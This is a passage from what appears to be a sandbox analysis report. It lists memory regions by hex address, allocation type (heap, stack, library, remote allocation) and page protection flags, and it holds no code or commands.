trusted library allocation
|
page read and write
|
||
21C38F0A000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
3BE31000
|
heap
|
page read and write
|
||
C2F428E000
|
stack
|
page read and write
|
||
7FFAABB10000
|
trusted library allocation
|
page read and write
|
||
389000
|
stack
|
page read and write
|
||
1A2C9890000
|
heap
|
page read and write
|
||
40C8C000
|
stack
|
page read and write
|
||
14590000
|
remote allocation
|
page read and write
|
||
28E30000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
7126C4E000
|
stack
|
page read and write
|
||
2B07C257000
|
heap
|
page execute and read and write
|
||
7FFAABB80000
|
trusted library allocation
|
page read and write
|
||
7FFAAB9E1000
|
trusted library allocation
|
page read and write
|
||
3DE30000
|
trusted library allocation
|
page read and write
|
||
3D920000
|
heap
|
page execute and read and write
|
||
3D89D000
|
trusted library allocation
|
page execute and read and write
|
||
29740000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
2408E000
|
heap
|
page read and write
|
||
3D8B0000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
7FFAAB88C000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C46DA000
|
heap
|
page read and write
|
||
3BE50000
|
heap
|
page read and write
|
||
2853D000
|
trusted library allocation
|
page read and write
|
||
7FFAABAD0000
|
trusted library allocation
|
page read and write
|
||
1A2C35E9000
|
trusted library allocation
|
page read and write
|
||
3BEC4000
|
trusted library allocation
|
page read and write
|
||
1415F000
|
stack
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
29FE0000
|
trusted library allocation
|
page read and write
|
||
29C0000
|
heap
|
page read and write
|
||
7FFAABA00000
|
trusted library allocation
|
page execute and read and write
|
||
459000
|
unkown
|
page read and write
|
||
D936B7E000
|
stack
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
7FDA7000
|
direct allocation
|
page read and write
|
||
3DDB9000
|
trusted library allocation
|
page read and write
|
||
402ED000
|
trusted library allocation
|
page read and write
|
||
40B5E000
|
trusted library allocation
|
page read and write
|
||
14590000
|
remote allocation
|
page read and write
|
||
7FFAAB906000
|
trusted library allocation
|
page read and write
|
||
28DF0000
|
trusted library allocation
|
page read and write
|
||
7FC10000
|
direct allocation
|
page read and write
|
||
29E326E2000
|
heap
|
page read and write
|
||
1A2C9973000
|
trusted library allocation
|
page read and write
|
||
21B2000
|
direct allocation
|
page read and write
|
||
21C346A0000
|
trusted library section
|
page readonly
|
||
4106F000
|
stack
|
page read and write
|
||
3EE00000
|
trusted library allocation
|
page read and write
|
||
411B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAABA90000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
296F8000
|
trusted library allocation
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
7F0C0000
|
direct allocation
|
page read and write
|
||
314B87E000
|
unkown
|
page readonly
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
1A2C436A000
|
heap
|
page read and write
|
||
2B000E37000
|
trusted library allocation
|
page read and write
|
||
3BE1D000
|
heap
|
page read and write
|
||
21C33902000
|
heap
|
page read and write
|
||
2851B000
|
trusted library allocation
|
page read and write
|
||
7FFAAB916000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
41A30000
|
remote allocation
|
page read and write
|
||
7FFAABAD0000
|
trusted library allocation
|
page read and write
|
||
233F000
|
stack
|
page read and write
|
||
219F000
|
direct allocation
|
page read and write
|
||
402E1000
|
trusted library allocation
|
page read and write
|
||
7EEDF000
|
direct allocation
|
page read and write
|
||
2B07C3BD000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
142BF000
|
stack
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
7F110000
|
direct allocation
|
page read and write
|
||
29EB0000
|
trusted library allocation
|
page read and write
|
||
1A2C35E0000
|
trusted library allocation
|
page read and write
|
||
7F0B0000
|
direct allocation
|
page read and write
|
||
24054000
|
heap
|
page read and write
|
||
4175E000
|
stack
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
25BE7000
|
heap
|
page read and write
|
||
1A2C3934000
|
heap
|
page read and write
|
||
40A30000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
244C000
|
direct allocation
|
page read and write
|
||
3BE60000
|
heap
|
page read and write
|
||
41DD0000
|
trusted library allocation
|
page read and write
|
||
41DE0000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
13C88000
|
direct allocation
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
21C38CB0000
|
trusted library allocation
|
page read and write
|
||
2A020000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
40B30000
|
trusted library allocation
|
page read and write
|
||
41D80000
|
trusted library allocation
|
page read and write
|
||
19AC174B000
|
heap
|
page read and write
|
||
7FB80000
|
direct allocation
|
page read and write
|
||
41A30000
|
remote allocation
|
page read and write
|
||
3DD2F000
|
stack
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
29E19E50000
|
heap
|
page read and write
|
||
21C38EC0000
|
heap
|
page read and write
|
||
41C30000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
13EBF000
|
stack
|
page read and write
|
||
29E32767000
|
heap
|
page read and write
|
||
296D0000
|
trusted library allocation
|
page read and write
|
||
40B70000
|
trusted library allocation
|
page read and write
|
||
29E1CB19000
|
trusted library allocation
|
page read and write
|
||
21C34102000
|
heap
|
page read and write
|
||
1A2C46D3000
|
heap
|
page read and write
|
||
25B4B000
|
trusted library allocation
|
page execute and read and write
|
||
297F0000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
21C39020000
|
remote allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C4730000
|
heap
|
page read and write
|
||
21C3415B000
|
heap
|
page read and write
|
||
2B07A17F000
|
heap
|
page read and write
|
||
40C05000
|
trusted library allocation
|
page read and write
|
||
1A2C41A0000
|
heap
|
page read and write
|
||
41450000
|
trusted library allocation
|
page read and write
|
||
25D0000
|
direct allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
3BFEE000
|
stack
|
page read and write
|
||
785000
|
heap
|
page read and write
|
||
2408000
|
direct allocation
|
page read and write
|
||
7E0000
|
remote allocation
|
page execute and read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
2989E000
|
unkown
|
page read and write
|
||
2B07A0DE000
|
heap
|
page read and write
|
||
28DDE000
|
trusted library allocation
|
page read and write
|
||
7FFAAB853000
|
trusted library allocation
|
page execute and read and write
|
||
40BF0000
|
trusted library allocation
|
page read and write
|
||
28DF0000
|
trusted library allocation
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
414B0000
|
trusted library allocation
|
page read and write
|
||
29E1CC05000
|
trusted library allocation
|
page read and write
|
||
8A0000
|
remote allocation
|
page execute and read and write
|
||
41430000
|
trusted library allocation
|
page read and write
|
||
41D90000
|
trusted library allocation
|
page read and write
|
||
41B7F000
|
stack
|
page read and write
|
||
3BE2B000
|
heap
|
page read and write
|
||
2B07A197000
|
heap
|
page read and write
|
||
29E19C60000
|
trusted library allocation
|
page read and write
|
||
40C0D000
|
trusted library allocation
|
page read and write
|
||
40B70000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
6EC41000
|
unkown
|
page execute read
|
||
97000
|
stack
|
page read and write
|
||
1A2C4346000
|
heap
|
page read and write
|
||
4096B000
|
trusted library allocation
|
page read and write
|
||
1A2C41A6000
|
heap
|
page read and write
|
||
21C338B3000
|
heap
|
page read and write
|
||
40AE0000
|
trusted library allocation
|
page read and write
|
||
1A2C4722000
|
heap
|
page read and write
|
||
296BB000
|
trusted library allocation
|
page read and write
|
||
314AA79000
|
stack
|
page read and write
|
||
C2F317E000
|
stack
|
page read and write
|
||
1A2C42F6000
|
heap
|
page read and write
|
||
1A2C4356000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
415DF000
|
unkown
|
page read and write
|
||
28E00000
|
trusted library allocation
|
page read and write
|
||
28D20000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C41A0000
|
heap
|
page read and write
|
||
7FFAABBB0000
|
trusted library allocation
|
page read and write
|
||
2630000
|
heap
|
page read and write
|
||
2B07C11F000
|
heap
|
page read and write
|
||
41D90000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
7FFAABA20000
|
trusted library allocation
|
page execute and read and write
|
||
19AC19B6000
|
heap
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
402E6000
|
trusted library allocation
|
page read and write
|
||
2451000
|
direct allocation
|
page read and write
|
||
3BDDE000
|
heap
|
page read and write
|
||
40CEE000
|
stack
|
page read and write
|
||
1A2C4331000
|
heap
|
page read and write
|
||
1A2C4364000
|
heap
|
page read and write
|
||
19AC1739000
|
heap
|
page read and write
|
||
29E1A0D5000
|
trusted library allocation
|
page read and write
|
||
D937B8E000
|
stack
|
page read and write
|
||
7F970000
|
direct allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C4175000
|
heap
|
page read and write
|
||
5EE000
|
stack
|
page read and write
|
||
24054000
|
heap
|
page read and write
|
||
28F6E000
|
stack
|
page read and write
|
||
28E40000
|
trusted library allocation
|
page read and write
|
||
296D0000
|
trusted library allocation
|
page read and write
|
||
40B50000
|
trusted library allocation
|
page read and write
|
||
7FFAAB8E6000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
3BED7000
|
heap
|
page read and write
|
||
297D0000
|
trusted library allocation
|
page read and write
|
||
7EB90000
|
direct allocation
|
page read and write
|
||
21C38C70000
|
trusted library allocation
|
page read and write
|
||
29E1BDFD000
|
trusted library allocation
|
page read and write
|
||
29E18420000
|
heap
|
page read and write
|
||
411B0000
|
trusted library allocation
|
page execute and read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
2B07BD54000
|
heap
|
page read and write
|
||
6EC5D000
|
unkown
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
40AD0000
|
trusted library allocation
|
page read and write
|
||
297E4000
|
trusted library allocation
|
page read and write
|
||
2395000
|
direct allocation
|
page read and write
|
||
1A2C435F000
|
heap
|
page read and write
|
||
97000
|
stack
|
page read and write
|
||
21C38F02000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
7EB36000
|
direct allocation
|
page read and write
|
||
40A90000
|
trusted library allocation
|
page read and write
|
||
314A97E000
|
unkown
|
page readonly
|
||
41400000
|
trusted library allocation
|
page read and write
|
||
D93713E000
|
stack
|
page read and write
|
||
29E2A051000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
21C38C80000
|
trusted library allocation
|
page read and write
|
||
25FDA000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
25B30000
|
trusted library allocation
|
page read and write
|
||
19AC1890000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
40BE0000
|
trusted library allocation
|
page read and write
|
||
570000
|
unkown
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
2B07A080000
|
heap
|
page read and write
|
||
40B80000
|
trusted library allocation
|
page read and write
|
||
2A000000
|
trusted library allocation
|
page read and write
|
||
146DF000
|
stack
|
page read and write
|
||
19AC19B4000
|
heap
|
page read and write
|
||
296E0000
|
trusted library allocation
|
page read and write
|
||
28DB0000
|
trusted library allocation
|
page read and write
|
||
3BE01000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
1A2C42A3000
|
heap
|
page read and write
|
||
1A2C4368000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1444E000
|
stack
|
page read and write
|
||
AC3000
|
heap
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
2B000089000
|
trusted library allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
415DF000
|
unkown
|
page read and write
|
||
24074000
|
heap
|
page read and write
|
||
2B010076000
|
trusted library allocation
|
page read and write
|
||
40A50000
|
heap
|
page read and write
|
||
29720000
|
trusted library allocation
|
page read and write
|
||
1430E000
|
stack
|
page read and write
|
||
29E19CDB000
|
trusted library allocation
|
page read and write
|
||
6C5000
|
heap
|
page read and write
|
||
25AC0000
|
trusted library section
|
page read and write
|
||
29E1C0A4000
|
trusted library allocation
|
page read and write
|
||
40DEF000
|
stack
|
page read and write
|
||
1A2C439E000
|
heap
|
page read and write
|
||
1A2C46DE000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
3DC10000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41450000
|
trusted library allocation
|
page read and write
|
||
41393000
|
heap
|
page read and write
|
||
29EC0000
|
trusted library allocation
|
page read and write
|
||
21C38EF2000
|
heap
|
page read and write
|
||
40C20000
|
trusted library allocation
|
page read and write
|
||
40C10000
|
trusted library allocation
|
page read and write
|
||
3D810000
|
trusted library section
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
D9367C3000
|
stack
|
page read and write
|
||
29E1A548000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
2B000429000
|
trusted library allocation
|
page read and write
|
||
402CE000
|
trusted library allocation
|
page read and write
|
||
28DE0000
|
trusted library allocation
|
page read and write
|
||
40C30000
|
trusted library allocation
|
page read and write
|
||
3D8AA000
|
trusted library allocation
|
page execute and read and write
|
||
2890000
|
direct allocation
|
page read and write
|
||
3D884000
|
trusted library allocation
|
page read and write
|
||
6EC5F000
|
unkown
|
page readonly
|
||
23FA8000
|
heap
|
page read and write
|
||
1A2C41BA000
|
heap
|
page read and write
|
||
1440E000
|
stack
|
page read and write
|
||
2B07C0B6000
|
heap
|
page read and write
|
||
7FFAAB9F0000
|
trusted library allocation
|
page read and write
|
||
1A2C41AA000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
28D40000
|
trusted library allocation
|
page read and write
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
25D8000
|
direct allocation
|
page read and write
|
||
1A2C42A0000
|
remote allocation
|
page read and write
|
||
3D8A6000
|
trusted library allocation
|
page execute and read and write
|
||
40C05000
|
trusted library allocation
|
page read and write
|
||
41441000
|
trusted library allocation
|
page read and write
|
||
44B000
|
remote allocation
|
page execute and read and write
|
||
29E1A30E000
|
trusted library allocation
|
page read and write
|
||
29E185F4000
|
heap
|
page read and write
|
||
7FFB05F30000
|
unkown
|
page readonly
|
||
28DA0000
|
trusted library allocation
|
page read and write
|
||
29E19C10000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
29E1C363000
|
trusted library allocation
|
page read and write
|
||
7EC30000
|
direct allocation
|
page read and write
|
||
21C34100000
|
heap
|
page read and write
|
||
41439000
|
trusted library allocation
|
page read and write
|
||
41720000
|
heap
|
page read and write
|
||
1430E000
|
stack
|
page read and write
|
||
1A2C4309000
|
heap
|
page read and write
|
||
29680000
|
trusted library allocation
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
29E32422000
|
heap
|
page read and write
|
||
29690000
|
trusted library allocation
|
page read and write
|
||
1A2C4362000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
6BE000
|
stack
|
page read and write
|
||
9A000
|
stack
|
page read and write
|
||
41550000
|
trusted library allocation
|
page read and write
|
||
28D30000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
41DC0000
|
trusted library allocation
|
page read and write
|
||
1A2C4364000
|
heap
|
page read and write
|
||
29E1C0B6000
|
trusted library allocation
|
page read and write
|
||
3D8A2000
|
trusted library allocation
|
page read and write
|
||
40C10000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
41570000
|
trusted library allocation
|
page read and write
|
||
1401F000
|
stack
|
page read and write
|
||
41420000
|
trusted library allocation
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
294E2000
|
heap
|
page read and write
|
||
1415F000
|
stack
|
page read and write
|
||
2849E000
|
stack
|
page read and write
|
||
13F1E000
|
stack
|
page read and write
|
||
3BE2B000
|
heap
|
page read and write
|
||
1A2C42A0000
|
remote allocation
|
page read and write
|
||
411C0000
|
trusted library allocation
|
page read and write
|
||
4F0000
|
unkown
|
page execute and read and write
|
||
13D8A000
|
stack
|
page read and write
|
||
29440000
|
heap
|
page read and write
|
||
411C0000
|
trusted library allocation
|
page read and write
|
||
1A2C41A0000
|
heap
|
page read and write
|
||
28D90000
|
trusted library allocation
|
page read and write
|
||
4124B000
|
heap
|
page read and write
|
||
72E000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
41490000
|
trusted library allocation
|
page read and write
|
||
14E67000
|
direct allocation
|
page read and write
|
||
29E1A541000
|
trusted library allocation
|
page read and write
|
||
414C0000
|
trusted library allocation
|
page read and write
|
||
7FFAABC60000
|
trusted library allocation
|
page read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
44B000
|
unkown
|
page execute and read and write
|
||
29FF0000
|
heap
|
page read and write
|
||
1A2C4352000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
D936A7E000
|
stack
|
page read and write
|
||
40C0D000
|
trusted library allocation
|
page read and write
|
||
290AE000
|
stack
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
297E0000
|
trusted library allocation
|
page read and write
|
||
3BDFA000
|
heap
|
page read and write
|
||
7FFAABB20000
|
trusted library allocation
|
page read and write
|
||
4096E000
|
trusted library allocation
|
page read and write
|
||
13D6A000
|
stack
|
page read and write
|
||
40A60000
|
trusted library allocation
|
page read and write
|
||
C2F3478000
|
stack
|
page read and write
|
||
3BDB3000
|
heap
|
page read and write
|
||
21C346D0000
|
trusted library section
|
page readonly
|
||
6EC56000
|
unkown
|
page readonly
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
7FFB05F31000
|
unkown
|
page execute read
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
29E1C0B3000
|
trusted library allocation
|
page read and write
|
||
28E00000
|
trusted library allocation
|
page read and write
|
||
6EC5F000
|
unkown
|
page readonly
|
||
29FF0000
|
trusted library allocation
|
page read and write
|
||
414A0000
|
trusted library allocation
|
page read and write
|
||
29E1C09E000
|
trusted library allocation
|
page read and write
|
||
41DA0000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
2405A000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
240A5000
|
heap
|
page read and write
|
||
296C1000
|
trusted library allocation
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
1A2C419D000
|
heap
|
page read and write
|
||
19AC1600000
|
heap
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page execute and read and write
|
||
28DE0000
|
trusted library allocation
|
page read and write
|
||
296D0000
|
trusted library allocation
|
page execute and read and write
|
||
3BDB6000
|
heap
|
page read and write
|
||
3D8A6000
|
trusted library allocation
|
page execute and read and write
|
||
2B07C0A0000
|
heap
|
page read and write
|
||
29E1C08F000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
21C3388E000
|
heap
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
1A2C9990000
|
trusted library allocation
|
page execute
|
||
70E000
|
stack
|
page read and write
|
||
60A000
|
heap
|
page read and write
|
||
41460000
|
trusted library allocation
|
page read and write
|
||
21F3000
|
direct allocation
|
page read and write
|
||
28E10000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C4192000
|
heap
|
page read and write
|
||
242D000
|
direct allocation
|
page read and write
|
||
3BED0000
|
heap
|
page read and write
|
||
299A0000
|
heap
|
page read and write
|
||
21C38C80000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
40A60000
|
trusted library allocation
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
24084000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C41AB000
|
heap
|
page read and write
|
||
242C0000
|
heap
|
page read and write
|
||
7126A4C000
|
stack
|
page read and write
|
||
1A2C4717000
|
heap
|
page read and write
|
||
28560000
|
trusted library allocation
|
page read and write
|
||
2B0101B8000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
40C20000
|
trusted library allocation
|
page read and write
|
||
13BAF000
|
direct allocation
|
page read and write
|
||
AB0000
|
heap
|
page read and write
|
||
2B07C158000
|
heap
|
page read and write
|
||
14590000
|
remote allocation
|
page read and write
|
||
29DFF000
|
stack
|
page read and write
|
||
3BE3B000
|
heap
|
page read and write
|
||
29E32690000
|
heap
|
page read and write
|
||
21C38E4E000
|
heap
|
page read and write
|
||
740000
|
unkown
|
page execute and read and write
|
||
29E32785000
|
heap
|
page read and write
|
||
29E19E20000
|
trusted library allocation
|
page read and write
|
||
29440000
|
trusted library allocation
|
page read and write
|
||
41410000
|
trusted library allocation
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
6EC40000
|
unkown
|
page readonly
|
||
296B0000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
2208000
|
direct allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C4326000
|
heap
|
page read and write
|
||
2A000000
|
trusted library allocation
|
page read and write
|
||
314B1FE000
|
stack
|
page read and write
|
||
19AC19BE000
|
heap
|
page read and write
|
||
21C3382B000
|
heap
|
page read and write
|
||
5CE000
|
heap
|
page read and write
|
||
40B40000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
25B0D000
|
trusted library allocation
|
page execute and read and write
|
||
3D8F7000
|
heap
|
page read and write
|
||
2950D000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C438A000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C436A000
|
heap
|
page read and write
|
||
41450000
|
trusted library allocation
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
296A0000
|
trusted library allocation
|
page read and write
|
||
7FFAAB85B000
|
trusted library allocation
|
page execute and read and write
|
||
21C38E1D000
|
heap
|
page read and write
|
||
29EB0000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
2443000
|
direct allocation
|
page read and write
|
||
21C346E0000
|
trusted library section
|
page readonly
|
||
25ABE000
|
stack
|
page read and write
|
||
2370000
|
heap
|
page read and write
|
||
13C5D000
|
direct allocation
|
page read and write
|
||
737000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
7FFAAB910000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
1A2C4711000
|
heap
|
page read and write
|
||
3BE5A000
|
heap
|
page read and write
|
||
29E19F76000
|
heap
|
page execute and read and write
|
||
1A2C41A2000
|
heap
|
page read and write
|
||
1A2C4393000
|
heap
|
page read and write
|
||
21C38E00000
|
heap
|
page read and write
|
||
1A2C438D000
|
heap
|
page read and write
|
||
41470000
|
trusted library allocation
|
page read and write
|
||
1A2C4398000
|
heap
|
page read and write
|
||
1A2C46F0000
|
heap
|
page read and write
|
||
411F3000
|
heap
|
page read and write
|
||
7FFAABB50000
|
trusted library allocation
|
page read and write
|
||
21C38D50000
|
trusted library allocation
|
page read and write
|
||
2B07BB97000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
3BD20000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C4368000
|
heap
|
page read and write
|
||
21C34C00000
|
trusted library allocation
|
page read and write
|
||
3D930000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
244A000
|
direct allocation
|
page read and write
|
||
2460000
|
direct allocation
|
page execute and read and write
|
||
40C20000
|
trusted library allocation
|
page read and write
|
||
13BDF000
|
direct allocation
|
page read and write
|
||
3DBE0000
|
trusted library allocation
|
page read and write
|
||
3BD99000
|
heap
|
page read and write
|
||
A7F000
|
stack
|
page read and write
|
||
2B000437000
|
trusted library allocation
|
page read and write
|
||
41560000
|
trusted library allocation
|
page read and write
|
||
1A2C98B0000
|
heap
|
page readonly
|
||
1A2C419C000
|
heap
|
page read and write
|
||
1A2C4729000
|
heap
|
page read and write
|
||
1A2C41A1000
|
heap
|
page read and write
|
||
40B10000
|
trusted library allocation
|
page read and write
|
||
3D890000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
21C34291000
|
trusted library allocation
|
page read and write
|
||
28CD1000
|
heap
|
page read and write
|
||
29CAF000
|
stack
|
page read and write
|
||
1A2C41A0000
|
heap
|
page read and write
|
||
2944F000
|
heap
|
page read and write
|
||
25B24000
|
heap
|
page read and write
|
||
1A2C3790000
|
heap
|
page read and write
|
||
2444000
|
direct allocation
|
page read and write
|
||
41480000
|
trusted library allocation
|
page read and write
|
||
800000
|
remote allocation
|
page execute and read and write
|
||
21C34000000
|
heap
|
page read and write
|
||
41447000
|
trusted library allocation
|
page read and write
|
||
1A2C9972000
|
trusted library allocation
|
page read and write
|
||
C2F33FD000
|
stack
|
page read and write
|
||
1A2C4349000
|
heap
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
1A2C4362000
|
heap
|
page read and write
|
||
296C0000
|
trusted library allocation
|
page read and write
|
||
19AC19B0000
|
heap
|
page read and write
|
||
29E2A0C6000
|
trusted library allocation
|
page read and write
|
||
1A2C4940000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
7FFAABBB0000
|
trusted library allocation
|
page read and write
|
||
296F0000
|
trusted library allocation
|
page read and write
|
||
1A2C42F6000
|
heap
|
page read and write
|
||
7FDF0000
|
trusted library allocation
|
page execute and read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
2401C000
|
heap
|
page read and write
|
||
1A2C4749000
|
heap
|
page read and write
|
||
28F0C000
|
stack
|
page read and write
|
||
41D60000
|
trusted library allocation
|
page read and write
|
||
2B07C290000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
1A2C9870000
|
trusted library allocation
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C3630000
|
trusted library allocation
|
page read and write
|
||
78E000
|
heap
|
page read and write
|
||
41440000
|
trusted library allocation
|
page read and write
|
||
1A2C419C000
|
heap
|
page read and write
|
||
29E323DC000
|
heap
|
page read and write
|
||
28D80000
|
trusted library allocation
|
page read and write
|
||
296C5000
|
trusted library allocation
|
page read and write
|
||
540000
|
unkown
|
page execute and read and write
|
||
1A2C41B1000
|
heap
|
page read and write
|
||
40A51000
|
heap
|
page read and write
|
||
41D70000
|
trusted library allocation
|
page read and write
|
||
7FC3F000
|
direct allocation
|
page read and write
|
||
7F140000
|
direct allocation
|
page read and write
|
||
4ED0000
|
heap
|
page read and write
|
||
2405B000
|
heap
|
page read and write
|
||
540000
|
remote allocation
|
page execute and read and write
|
||
1A2C41A6000
|
heap
|
page read and write
|
||
29E18299000
|
heap
|
page read and write
|
||
3BEA0000
|
trusted library section
|
page read and write
|
||
21C38EFC000
|
heap
|
page read and write
|
||
7FFAABA80000
|
trusted library allocation
|
page read and write
|
||
1A2C419A000
|
heap
|
page read and write
|
||
40A40000
|
trusted library allocation
|
page read and write
|
||
29720000
|
trusted library allocation
|
page read and write
|
||
C2F3537000
|
stack
|
page read and write
|
||
1A2C41B1000
|
heap
